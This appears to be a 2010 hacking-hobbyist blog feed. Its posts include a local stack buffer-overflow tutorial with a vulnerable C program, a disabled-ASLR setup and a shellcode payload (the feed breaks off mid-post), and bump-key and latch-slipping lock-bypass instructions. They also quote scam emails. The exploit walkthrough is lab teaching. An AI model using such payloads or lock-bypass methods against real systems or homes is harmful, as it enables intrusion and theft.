type='html'>Thats right girls, sX has another goodie up for grabs :D I really liked the idea EFF had with HTTPS Everywhere but was saddened when they said they will not be developing one for chrome due to some gayness, so i took the idea and ran with it. So today, with much pride, i bring you HTTPS "i know the name blows".  HTTPS is a chrome extension that will look for HTTPS services on any host you goto, and given how you set it up it will just forward you to the https version of the site or display a icon you can click to goto the https version. Its still in beta so there may be a few bugs here and there but it should serve you well most of the time :) enjoy!&lt;br /&gt;&lt;br /&gt;DOWNLOAD: &lt;a href="http://dealerweb.grandcare.com/https.crx"&gt;here&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-4163158956959354519?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/4163158956959354519/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/11/https-everywhere-from-chrome.html#comment-form' title='11 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/4163158956959354519'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/4163158956959354519'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/11/https-everywhere-from-chrome.html' title='HTTPS everywhere for chrome!!'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>11</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-5081539820475011359</id><published>2010-11-06T16:23:00.000-07:00</published><updated>2010-11-06T16:57:39.616-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='dc414'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>The goodies from the last dc414 meeting</title><content type='html'>Matt gave out some sweet goodies at the end of his presentation. The first little gem was a Kwikset's KW1 keyway bump key.&lt;br /&gt;&lt;BR&gt;&lt;br /&gt;&lt;img src="http://lh4.ggpht.com/_RKrcdjxD91w/TNXArWIF-bI/AAAAAAAAAB4/1IDe1iuC02o/s640/IMG_20101106_151953.jpg"&gt;&lt;BR&gt;&lt;br /&gt;and the Schlage's SC1 keyway bump key:&lt;br /&gt;&lt;img src="http://lh3.ggpht.com/_RKrcdjxD91w/TNXArPVNJwI/AAAAAAAAAB0/J4xVd-zjjFY/s640/IMG_20101106_151938.jpg"&gt;&lt;br /&gt;I also asked Matt to write up a little info on each thing so here it is:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;these two keyways account for 90% of residential door locks in America.  Both keys were made on a standard duplicator using depth keys from http://www.lockpicks.com/depthkeys.aspx and are cut to .010" less than a 9-9-9-9-9 depth; I accomplished this by using the calibration screw on my antique key duplicator. After this I made an extra cut at the end of the key as often when you cut a 9-9-9-9-9 key there will still be a large ramp on the end of the key, you want the ramps to be of uniform size.  &lt;br /&gt;&lt;br /&gt;To further improve the keys I used a hand file to file off the sharp part of the ramps and bring the ramps down to about a depth of 8 or .215"; through experimentation I have determined this to be the ideal depth for the ramps.  Note this 8 cut in only true in a Schlage system; Kwikset's maximum depth is a 7 so in a Kwikset system a bump key should be cut to 7-7-7-7-7 minus .010" and the ramps should be down to a depth of 6. &lt;br /&gt;&lt;br /&gt;To use one of these bump keys simply insert into the lock; pull one click out; then both strike the end of the key and turn the key at the same time.  If your timing is correct the lock will open. Almost anything can be used to strike the end of the key, I prefer the end of a screw driver as nobody is going to question me carrying a screw driver on me; however, better results can be achieved. using a purpose built tool such as the handmade Tomahawk bump hammer available at http://www.lockpicks.com/tomahawk-bump-hammer.aspx&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;I was also lucky enough to get "The lucky number 7"&lt;br /&gt;&lt;br /&gt;&lt;img src="http://lh6.ggpht.com/_RKrcdjxD91w/TNXAqXiDDjI/AAAAAAAAABw/-dn1pupqzYw/s640/IMG_20101106_151827.jpg"&gt;&lt;br /&gt;&lt;br /&gt;Matt said this about it:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;The lucky number seven is a solid brass '7' that can be purchased from Menards for $1; it was originally intended to be used to display an address on a house.  This tool can be used in what is referred to as "loiding" a door which is slipping the spring loaded latch on a lever or knob either in the traditional "credit card" manner that everyone knows about or in the more useful and awesome grab the latch from the wrong side and make your way in.  This tool is often carried by experienced red team members.&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Thanx again Matt for all your hard work, sharing all of it with us and of course all the goodies!! :D&lt;br /&gt;&lt;br /&gt;More info on dc414 meetings: &lt;a href="http://dc414.org"&gt;dc414.org&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-5081539820475011359?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/5081539820475011359/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/11/goodies-from-last-dc414-meeting.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/5081539820475011359'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/5081539820475011359'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/11/goodies-from-last-dc414-meeting.html' title='The goodies from the last dc414 meeting'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://lh4.ggpht.com/_RKrcdjxD91w/TNXArWIF-bI/AAAAAAAAAB4/1IDe1iuC02o/s72-c/IMG_20101106_151953.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-9068711395034584413</id><published>2010-10-27T12:00:00.000-07:00</published><updated>2010-10-27T12:16:55.413-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='email'/><category scheme='http://www.blogger.com/atom/ns#' term='scam'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>lol wtf, more hacked email?</title><content type='html'>I got this a while back. I dont know this guy at all, but he had my email on his contact list for what ever reason so when his account got owned the attacker "or bot" just mass mailed everyone this little gem:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style:italic;"&gt;Subject: SAD NEWS !!!!!!!!!&lt;br /&gt;&lt;br /&gt;Hello !!&lt;br /&gt;&lt;br /&gt;I'm sorry I didn't inform you about my travel plan. Am presently in&lt;br /&gt;Wales ,United Kingdom but i experienced something horrible at a Park.I&lt;br /&gt;was mugged at gun point, all my cash,credit cards,cell phone and some&lt;br /&gt;other valuable things were stolen in the process but thanking God for&lt;br /&gt;saving my life and keeping my passport.I need your financial&lt;br /&gt;assistance to settle my hotel bills immediately and to return back to&lt;br /&gt;the airport.&lt;br /&gt;&lt;br /&gt;I promise to pay back  soon as i get home.I really don't have access&lt;br /&gt;to money right now,i need your help within twinkle of an eye. I&lt;br /&gt;already canceled  my cards immediately after the Incident. Am at the&lt;br /&gt;public library where am making use of the free internet access.I would&lt;br /&gt;be greatful if you can render your assistance on time. Am anxiously&lt;br /&gt;waiting to hear from you cause my flight leaves in few hrs but need to&lt;br /&gt;settle the hotel bills and please save me from being embarrassed.&lt;br /&gt;&lt;br /&gt;Thanks&lt;br /&gt;&lt;br /&gt;--&lt;br /&gt;Joe Maggio&lt;br /&gt;&lt;br /&gt;Maggio &amp; Associates&lt;br /&gt;1181 South Lake Claiborne Road&lt;br /&gt;Port Gibson,  MS  39150&lt;br /&gt;&lt;br /&gt;joevmaggio@gmail.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;I have read about this scam "or ones like it" in a few places but never seen it in action. Not a bad attempt at SE really, well accept for the broken english. If i knew this guy and gave a shit i might have fallen for something like this, at lest would have tried to find out more information and waisted a few minutes. I still think this is a brilliant tactic and i can see why its been so affective in the wild.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-9068711395034584413?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/9068711395034584413/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/10/lol-wtf-more-hacked-email.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/9068711395034584413'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/9068711395034584413'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/10/lol-wtf-more-hacked-email.html' title='lol wtf, more hacked email?'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-7815518247523058654</id><published>2010-10-04T15:56:00.000-07:00</published><updated>2010-10-04T18:44:38.650-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='neutrality'/><category scheme='http://www.blogger.com/atom/ns#' term='freedom'/><title type='text'>It's put up or shut up time!</title><content type='html'>It's put up or shut up time on Net Neutrality.&lt;br /&gt;&lt;br /&gt;The fate of the open Internet is now in the hands of FCC Chairman Julius Genachowski. He simply needs the courage to choose the right action... That's where you come in.&lt;br /&gt;&lt;br /&gt;What should Chairman Genachowski do right now? (Answer by clicking your choice below):&lt;br /&gt;&lt;br /&gt;A. &lt;a href="https://secure.freepress.net/site/Advocacy?cmd=display&amp;page=UserAction&amp;id=489"&gt;Protect free speech and consumer choice on the Internet&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;or&lt;br /&gt;&lt;br /&gt;B. &lt;a href="http://www.savetheinternet.com/really"&gt;Cave to lobbyists and let AT&amp;T and Comcast take away our Internet freedom.&lt;/a&gt;&lt;br /&gt;I'm guessing you clicked the first option. Seems obvious, right?&lt;br /&gt;&lt;br /&gt;Genachowski has the power to deliver on Net Neutrality. He just needs to call a Commission vote to restore the FCC as a watchdog of our online rights by reclassifying Internet access under Title II of the Communications Act.&lt;br /&gt;&lt;br /&gt;Genachowski has the legal clearance, political cover and momentum to make this historic vote happen:&lt;br /&gt;&lt;br /&gt;... Last Friday, House Commerce Committee Chairman Henry Waxman told Genachowski to "move forward under Title II";1&lt;br /&gt;&lt;br /&gt;... On Sunday, the Washington Post published a column saying that "it's put up or shut up time" for the chairman to protect Net Neutrality;2&lt;br /&gt;&lt;br /&gt;... A majority of FCC Commissioners are ready to vote in favor of Title II and Net Neutrality. Genachowski just needs to call the vote;&lt;br /&gt;&lt;br /&gt;... Major daily newspapers, including the New York Times, the Boston Globe, the Los Angeles Times and USA Today, have editorialized in favor of FCC action for Net Neutrality;3&lt;br /&gt;&lt;br /&gt;... President Obama has publicly urged for Net Neutrality protections on at least nine occasions;4&lt;br /&gt;&lt;br /&gt;... The leaders of the relevant committees in the House and Senate have given Genachowski a green light to move forward;&lt;br /&gt;&lt;br /&gt;... And, most importantly, more than 2 million Americans have demanded that Washington protect the open Internet from blocking and discrimination by corporations.5&lt;br /&gt;&lt;br /&gt;By taking action now, the chairman will put the Net Neutrality question to rest and will have the ability to achieve the goals of the National Broadband Plan.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://secure.freepress.net/site/Advocacy?cmd=display&amp;page=UserAction&amp;id=489"&gt;Tell Genachowski: It's Time to Step Up&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;All of our work has come to this moment, right now, and to this chairman, Julius Genachowski. He simply needs to take the next step. &lt;br /&gt;&lt;br /&gt;Please take 30 seconds to help make certain he does the right thing for Net Neutrality.&lt;br /&gt;&lt;br /&gt;Thank you,&lt;br /&gt;&lt;br /&gt;1. "Waxman Backs Reclassification of Broadband," The Hill: http://thehill.com/blogs/hillicon-valley/technology/121681-waxman-backs-fcc-reclassification-of-broadband&lt;br /&gt;&lt;br /&gt;2. "It's Put Up or Shut Up Time for the FCC's Net Neutrality Advocates," Washington Post: http://www.washingtonpost.com/wp-dyn/content/article/2010/10/02/AR2010100203245_pf.html&lt;br /&gt;&lt;br /&gt;3. "Chairman Genachowski: Can You Hear Us Now," MediaCitizen: http://mediacitizen.blogspot.com/2010/08/chairman-genachowski-can-you-hear-us.html&lt;br /&gt;&lt;br /&gt;4. "President Obama Supports Net Neutrality," SavetheInternet.com: http://www.savetheinternet.com/obama&lt;br /&gt;&lt;br /&gt;5. "Two Million for Net Neutrality," SavetheInternet.com: https://secure.freepress.net/site/Advocacy?cmd=display&amp;page=UserAction&amp;id=356&lt;br /&gt;&lt;br /&gt;Want to learn more? Join them on &lt;a href="http://www.facebook.com/freepress"&gt;Facebook&lt;/a&gt; and follow us on &lt;a href="http://twitter.com/freepress"&gt;Twitter&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-7815518247523058654?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/7815518247523058654/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/10/its-put-up-or-shut-up-time.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/7815518247523058654'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/7815518247523058654'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/10/its-put-up-or-shut-up-time.html' title='It&apos;s put up or shut up time!'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-5429597023926589686</id><published>2010-10-03T12:24:00.000-07:00</published><updated>2010-11-08T08:04:59.221-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='fun'/><category scheme='http://www.blogger.com/atom/ns#' term='encryption'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><title type='text'>Tcpcrypt on Ubuntu.</title><content type='html'>If you dont already know here is what tcpcrypt is and a run down on what it does.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style:italic;"&gt;Taken from tcpcrypt.org&lt;/span&gt;&lt;br /&gt;&lt;blockquote&gt;Tcpcrypt is a protocol that attempts to encrypt (almost) all of your network traffic. Unlike other security mechanisms, Tcpcrypt works out of the box: it requires no configuration, no changes to applications, and your network connections will continue to work even if the remote end does not support Tcpcrypt, in which case connections will gracefully fall back to standard clear-text TCP. Install Tcpcrypt and you'll feel no difference in your every day user experience, but yet your traffic will be more secure and you'll have made life much harder for hackers.&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;And yes its as good as it sounds, but it does have a few weaknesses. Heres a little blerb of how it works and more detials on its short comings. &lt;br /&gt;&lt;br /&gt;&lt;span style="font-style:italic;"&gt;From tcpcrypt.org&lt;/span&gt;&lt;br /&gt;&lt;blockquote&gt;Tcpcrypt is opportunistic encryption. If the other end speaks Tcpcrypt, then your traffic will be encrypted; otherwise it will be in clear text. Thus, Tcpcrypt alone provides no guarantees—it is best effort. If, however, a Tcpcrypt connection is successful and any attackers that exist are passive, then Tcpcrypt guarantees privacy.&lt;br /&gt;&lt;br /&gt;Network attackers come in two varieties: passive and active (man-in-the-middle). Passive attacks are much simpler to execute because they just require listening on the network. Active attacks are much harder as they require listening and modifying network traffic, often requiring very precise timing that can make some attacks impractical.&lt;br /&gt;&lt;br /&gt;By default Tcpcrypt is vulnerable to active attacks—an attacker can, for example, modify a server's response to say that Tcpcrypt is not supported (when in fact it is) so that all subsequent traffic will be clear text and can thus be eavesdropped on.&lt;br /&gt;&lt;br /&gt;Tcpcrypt, however, is powerful enough to stop active attacks, too, if the application using it performs authentication. For example, if you log in to online banking using a password and the connection is over Tcpcrypt, it is possible to use that shared secret between you and the bank (i.e., the password) to authenticate that you are actually speaking to the bank and not some active (man-in-the-middle) attacker. The attacker cannot spoof authentication as it lacks the password. Thus, by default, Tcpcrypt will try its best to protect your traffic. Applications requiring stricter guarantees can get them by authenticating a Tcpcrypt session.&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Now to install this guy we need to get our system ready so lets start by opening a term up and running this:&lt;br /&gt;&lt;blockquote&gt;sudo apt-get install iptables libcap-dev libssl-dev libnfnetlink-dev libnetfilter-queue-dev git-core&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Then run these commands:&lt;br /&gt;&lt;blockquote&gt;git clone git://github.com/sorbo/tcpcrypt.git&lt;br /&gt;cd tcpcrypt/user&lt;br /&gt;make&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Now we need to edit rc.local "/etc/rc.local" &lt;br /&gt;&lt;blockquote&gt;sudo vi /etc/rc.local&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Add this line before "exit 0"&lt;br /&gt;&lt;blockquote&gt;sh /home/user/tcpdump/user/launch_tcpcryptd.sh&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;And restart your done!! You may want to move the tcpcrypt dir out of your home dir but thats up to you. Enjoy!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-5429597023926589686?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/5429597023926589686/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/10/tcpcrypt-on-ubuntu.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/5429597023926589686'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/5429597023926589686'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/10/tcpcrypt-on-ubuntu.html' title='Tcpcrypt on Ubuntu.'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-6336367425905156808</id><published>2010-09-14T14:19:00.000-07:00</published><updated>2010-09-14T14:23:06.627-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='email'/><category scheme='http://www.blogger.com/atom/ns#' term='scam'/><category scheme='http://www.blogger.com/atom/ns#' term='spam'/><title type='text'>Why dont they ever give up??</title><content type='html'>Got this crap this morning.&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;from Barry Roberts &lt;b_roberts@mbnt.ky&gt;&lt;br /&gt;reply-to baroberts11@gmail.com&lt;br /&gt;to XXXX@XXXX.com&lt;br /&gt;date Tue, Sep 14, 2010 at 6:11 AM&lt;br /&gt;subject XXXX?- Please get to me asap!&lt;br /&gt;hide details 6:11 AM (10 hours ago)&lt;br /&gt;318 s. 9th ave.&lt;br /&gt;mke, WI 53080&lt;br /&gt;4143651087&lt;br /&gt;&lt;br /&gt;Dear XXXX,&lt;br /&gt;&lt;br /&gt;An earlier e-mail was sent to you but I did not receive any reply. Please is this XXXX with the contact address above? I will like us to discuss about a late family member's finances and estate with us.&lt;br /&gt;&lt;br /&gt;I am currently in the United Kingdom for a few months so you can call me on +44 203 318 0079 or by email.&lt;br /&gt;&lt;br /&gt;Regards,&lt;br /&gt;Barry Roberts&lt;br /&gt;TEL: +44 203 318 0079&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-6336367425905156808?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/6336367425905156808/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/09/why-dont-they-ever-give-up.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/6336367425905156808'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/6336367425905156808'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/09/why-dont-they-ever-give-up.html' title='Why dont they ever give up??'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-2480930642679461721</id><published>2010-09-11T10:15:00.000-07:00</published><updated>2010-09-11T10:31:31.931-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='js'/><category scheme='http://www.blogger.com/atom/ns#' term='as3'/><category scheme='http://www.blogger.com/atom/ns#' term='fun'/><category scheme='http://www.blogger.com/atom/ns#' term='code'/><title type='text'>JS via AS3</title><content type='html'>Heres a little script that runs javascript from flash.&lt;br /&gt;&lt;br /&gt;swfjs.as&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;package {&lt;br /&gt; import flash.display.*;&lt;br /&gt; import flash.external.*;&lt;br /&gt; public class swfjs extends Sprite {&lt;br /&gt;  function swfjs(){&lt;br /&gt;   ExternalInterface.call("function(){alert(1);}");&lt;br /&gt;  }&lt;br /&gt; }&lt;br /&gt;}&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;enjoy :D&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-2480930642679461721?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/2480930642679461721/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/09/js-via-as3.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/2480930642679461721'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/2480930642679461721'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/09/js-via-as3.html' title='JS via AS3'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-2939506363781705400</id><published>2010-09-07T17:33:00.000-07:00</published><updated>2010-09-07T19:23:02.436-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='fun'/><category scheme='http://www.blogger.com/atom/ns#' term='bof'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>More buffer overflows on the easy.</title><content type='html'>In my last BOF &lt;a href="http://ssolutionx.blogspot.com/2010/08/buffer-overflows-on-easy.html"&gt;post&lt;/a&gt; i showed a slick way to do a local buffer overflow and how to do it with a really small buffer. This time we will work with a nice big buffer like 400 chars long. Like before lets get our environment ready, we can start by turning off address space randomization:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;echo 0 &gt; /proc/sys/kernel/randomize_va_space&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Last time we saw how to use core dumps, lets enable them again. Now we need a app:&lt;br /&gt;&lt;br /&gt;BOF2.c&lt;br /&gt;&lt;blockquote&gt;#include &lt; stdio.h &gt;&lt;br /&gt;#include &lt; string.h &gt;&lt;br /&gt;&lt;br /&gt;int main (int argc, char** argv)&lt;br /&gt;{&lt;br /&gt;        char buffer [400];&lt;br /&gt;        strcpy(buffer, argv [1]);&lt;br /&gt;        printf("sent to buffer: %s \n", buffer);&lt;br /&gt;        return 0;&lt;br /&gt;}&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;And we compile it like so:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;gcc -z execstack -g -o BOF2 -fno-stack-protector -mpreferred-stack-boundary=2 BOF2.c&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Yes this is the same app as before but with a much bigger buffer now lets run a few tests and see just how much room we have to work with. &lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;./BOF2 `perl -e 'print "A" x 402'`&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Ok everything is normal lets try: &lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;./BOF2 `perl -e 'print "A" x 404'`&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Oh we get a seg fualt and a core dump, when we load that up in gdb and look at the registars we see we overwrote all of ebp with 41's So we know from last time eip is only 4 spaces chars away making our total buffer size 408, but lets test that out:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;./BOF2 `perl -e 'print "A" x 408'`&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Again we seg fualt and when we open the core dump in gdb and inspect the registars we see we can control eip. :D Ok so now we need to get the address of esp so we can get our attack vector. We do this like so:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;gdb -q BOF2&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;then we need insert a line break at our point of BoF, in our app its line 7. So enter this command:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;b 7&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Then run a little test so we can get esps address:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;run test&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Now when the app hits out line break it should stop running and give us a chance to look at a few things like register addresses. We do that with the "i r" command. We should have something like this:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;Breakpoint 1, main (argc=2, argv=0xbffffd24) at BOF2.c:7&lt;br /&gt;7	        strcpy(buffer, argv [1]);&lt;br /&gt;(gdb) i r&lt;br /&gt;eax            0xbffffd24	-1073742556&lt;br /&gt;ecx            0xbe3b369c	-1103415652&lt;br /&gt;edx            0x2	2&lt;br /&gt;ebx            0xb7fd8ff4	-1208119308&lt;br /&gt;esp            0xbffffb00	0xbffffb00&lt;br /&gt;ebp            0xbffffc98	0xbffffc98&lt;br /&gt;esi            0xb7ffece0	-1207964448&lt;br /&gt;edi            0x0	0&lt;br /&gt;eip            0x804839d	0x804839d &lt;main+9&gt;&lt;br /&gt;eflags         0x286	[ PF SF IF ]&lt;br /&gt;cs             0x73	115&lt;br /&gt;ss             0x7b	123&lt;br /&gt;ds             0x7b	123&lt;br /&gt;es             0x7b	123&lt;br /&gt;fs             0x0	0&lt;br /&gt;gs             0x33	51&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;And there you have it, esp is at 0xbffffb00, now lets subtract 300 from that to get our target address "attack address". We do that with this command:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;printf "%x\n" $((0xbffffb00-200))&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Which should give us "bffffa38" &lt;This is what we will be putting in eip&lt;br /&gt;&lt;br /&gt;Now we need some shell code, but lucky us we can just use the same stuff we used last time. Its time for some math&lt;br /&gt;&lt;br /&gt;Our buffer it 408 chars long.&lt;br /&gt;-We will want to use at lest 200 chars for a &lt;a href="http://en.wikipedia.org/wiki/NOP_slide"&gt;NOP sled&lt;/a&gt;.&lt;br /&gt;------------&lt;br /&gt;208&lt;br /&gt;-Our shell code (28)&lt;br /&gt;------------&lt;br /&gt;Ok we are left with 180 chars to fill up, so to make sure we get the right address in eip we will just fill it up with our attack address (bffffa38) Now eip is 4 chars long so lets take 180/4 which gives us 45. So we need to repeat bffffa38 45 times in little endian format and hex it.&lt;br /&gt;&lt;br /&gt;So our end result shoule look something like this:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;`perl -e 'print "\x90" x 200'``printf "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"``perl -e 'print "\x38\xfa\xff\xbf" x 45'`&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;This part is the NOP sled:&lt;br /&gt;&lt;blockquote&gt;`perl -e 'print "\x90" x 200'`&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Here is our shell code:&lt;br 